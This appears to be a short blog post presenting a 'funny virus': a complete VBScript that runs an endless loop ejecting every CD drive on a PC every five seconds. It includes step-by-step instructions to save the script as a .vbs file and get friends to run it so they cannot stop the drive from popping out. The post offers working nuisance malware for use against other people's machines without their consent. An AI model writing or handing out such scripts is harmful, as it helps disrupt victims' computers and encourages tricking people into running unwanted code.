Hello Reader !! Create a VBS file as a virus to prank your friends by continuously poping-out CD Drive of their PC. Here is the Step by Step Guide.
1. First open notepad.
2. Copy and Paste this code.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
3. REMEMBER, DO NOT edit anything.
4. Save the file as anyname.vbs
After your friends run this vbs file, their CD Drive will keeps on poping out even they put it inside. They can't stop the pop-out.
→Don't run the file on your own PC. If you got caught by any VBS Virus, Click here to see how to stop vbs virus.
→While saving the file, don't forget to add .vbs at the end of the file name :D
→→What are you waiting for?? Go ahead and scare the shit out of your friends.←←
CHEERS BLOGGING!!!
Title :
Create a funny Virus to continuously pop-out CD Drive of any PC.
Description : Hello Reader !! Create a VBS file as a virus to prank your friends by continuously poping-out CD Drive of their PC. Here is the Step by ...
Rating :
5